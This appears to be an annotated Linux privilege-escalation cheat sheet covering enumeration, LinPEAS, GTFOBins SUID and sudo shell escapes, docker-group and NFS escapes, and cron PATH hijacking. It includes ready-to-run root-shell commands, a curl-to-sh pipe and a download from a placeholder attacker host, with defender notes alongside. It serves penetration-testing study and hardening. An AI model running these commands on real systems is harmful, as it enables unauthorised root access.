
Linux Privilege Escalation Workflows

Workflow 1: Manual Enumeration

System Information

# OS and kernel version (three sources; distros sometimes patch one but not another)
uname -a
cat /etc/os-release
cat /proc/version

# Check for writable paths
# -writable tests writability for the *current* user, not only world-writable;
# 2>/dev/null drops the permission-denied noise find emits when walking /.
find / -writable -type d 2>/dev/null
find / -writable -type f 2>/dev/null

# Network info
# ss -tlnp: TCP listeners only; netstat -tulpn adds UDP (-u). netstat ships with
# net-tools and is absent on many current distributions, so expect one to fail.
ip a
ss -tlnp
netstat -tulpn

SUID/SGID Binaries

# Find SUID binaries
# -perm -4000 matches the setuid bit, -perm -2000 the setgid bit. Compare the
# result with the distribution's stock set: anything unexpected is a finding
# for the attacker and an audit item for the defender.
find / -perm -4000 -type f 2>/dev/null
find / -perm -2000 -type f 2>/dev/null

# Cross-reference with GTFOBins
# https://gtfobins.github.io/

Sudo Configuration

# List the invoking user's sudo rules (may prompt for the user's own password)
sudo -l
# Check for:
# - (ALL) NOPASSWD: /usr/bin/vim
# - (ALL) NOPASSWD: /usr/bin/find
# - (ALL) NOPASSWD: /usr/bin/python3
# - Wildcard entries: /usr/bin/rsync *
# A rule granting an editor, an interpreter, or any binary that can spawn a
# shell is effectively a root grant; these are the same entries a hardening
# review removes or replaces with a restricted wrapper.

Cron Jobs

# System-wide crontab and the periodic directories
cat /etc/crontab
ls -la /etc/cron.*
# Only the current user's crontab; root's jobs are not visible here, which is
# why process monitoring below is suggested.
crontab -l
# Monitor processes for hidden cron
# Use pspy to see processes running as root
# pspy is a third-party binary: obtain it from a source you trust and review
# it before running, as with LinPEAS below.

Capabilities

# -r recurses from /; 2>/dev/null hides unreadable paths
getcap -r / 2>/dev/null
# Interesting capabilities:
# cap_setuid - python3, perl, ruby (an interpreter that can change its own uid)
# cap_dac_override - any binary (bypasses file read/write/execute permission checks)
# cap_net_raw - tcpdump (raw socket access / traffic capture rather than direct root)
# Defender note: file capabilities on interpreters are rarely legitimate;
# getcap output is cheap to baseline and diff.

Workflow 2: Automated Enumeration

LinPEAS

# Download and run
# NOTE(review): this pipes an unverified remote script straight into a shell --
# whatever the server (or anything in the network path) returns is executed.
# Prefer saving to a file, reviewing/checksumming it, then running that copy.
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh

# Or transfer and run
# "attacker" is a placeholder host; plain http is unauthenticated transport.
wget http://attacker/linpeas.sh
chmod +x linpeas.sh
# -a is linpeas's all-checks mode; 2>&1 | tee keeps a full copy for the report
./linpeas.sh -a 2>&1 | tee linpeas_output.txt

Linux Exploit Suggester

# Fetches the moving master branch, so contents change between runs; review or
# pin a known revision before executing, as with LinPEAS above.
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
# Matches the local kernel/distro version against its CVE list; distros backport
# fixes, so treat hits as candidates to confirm, not as proven exposure.
./linux-exploit-suggester.sh

Workflow 3: Common Exploitation

SUID Binary Exploitation (GTFOBins)

# /usr/bin/find with SUID
# -p asks the shell to keep its effective uid (bash otherwise resets euid to the
# real uid at startup); -quit stops after the first match so one shell is spawned.
find . -exec /bin/sh -p \; -quit

# /usr/bin/python3 with SUID
# Same -p reasoning as above; execl replaces the python process with the shell.
python3 -c 'import os; os.execl("/bin/sh", "sh", "-p")'

# /usr/bin/vim with SUID
# -c runs the ex command ':!sh' at startup
vim -c ':!sh'

# /usr/bin/nmap with SUID (old versions)
# --interactive was removed in later nmap releases; '!sh' is typed at the
# nmap> prompt, not at the shell.
nmap --interactive
!sh

Sudo Abuse Examples

# sudo vim
sudo vim -c ':!sh'

# sudo find
# -quit ends the traversal after the first -exec fires
sudo find / -exec /bin/sh \; -quit

# sudo python3
# pty.spawn gives an interactive, pty-backed bash
sudo python3 -c 'import pty; pty.spawn("/bin/bash")'

# sudo env with LD_PRELOAD
# If env_keep+=LD_PRELOAD is set:
# Compile shared object that spawns shell
# sudo LD_PRELOAD=/tmp/exploit.so /usr/bin/any_allowed_command
# /tmp/exploit.so and any_allowed_command are illustrative names. From the
# defender side, env_keep entries for loader variables (LD_PRELOAD,
# LD_LIBRARY_PATH) in the sudoers configuration are the setting to audit.

PwnKit (CVE-2021-4034)

# Check if vulnerable
pkexec --version
# Vulnerable: polkit < 0.120
# Distros backport the fix without bumping the version, so the string alone
# can be a false positive; confirm against the package changelog for the CVE.
# The issue is only reachable while pkexec is setuid root; dropping the setuid
# bit was the published interim mitigation.

# Multiple public exploits available
# Usage: compile and run - instant root

Dirty Pipe (CVE-2022-0847)

# Check kernel version
uname -r
# Vulnerable: kernel >= 5.8 and older than the fixed releases 5.16.11, 5.15.25, 5.10.102
# As with PwnKit, backported kernels may report an "old" version yet carry the
# fix; confirm via the distro's kernel changelog.

# Exploit overwrites read-only files via pipe splice

Workflow 4: Advanced Techniques

Docker Escape (if user is in docker group)

# Check group membership
id
# If in docker group:
# -v /:/mnt bind-mounts the host root filesystem into the container, and
# chroot /mnt turns that into a host-root shell. Docker documents the docker
# group as root-equivalent; defenders should treat membership like sudo access.
docker run -v /:/mnt --rm -it alpine chroot /mnt sh

NFS Root Squashing Bypass

# Check NFS exports
# "target" is a placeholder host; showmount queries the remote export list,
# /etc/exports is the local server-side configuration.
showmount -e target
cat /etc/exports
# If no_root_squash is set:
# (root on the client is not remapped to an unprivileged uid on the share)
# Mount share, create SUID binary, execute on target

PATH Hijacking in Cron

# If cron job uses relative paths:
# Create malicious binary in writable PATH directory
# NOTE(review): bash's builtin echo does not interpret \n without -e, so as
# written this produces a single-line file rather than a script with a shebang;
# treat the snippet as illustrative. /tmp/command_name is a placeholder for
# the name the cron entry invokes. Defender note: cron jobs should use absolute
# paths and a PATH with no user-writable entries.
echo '#!/bin/bash\ncp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash' > /tmp/command_name
chmod +x /tmp/command_name
# Wait for cron to execute, then:
# -p keeps the setuid-granted effective uid instead of dropping it
/tmp/rootbash -p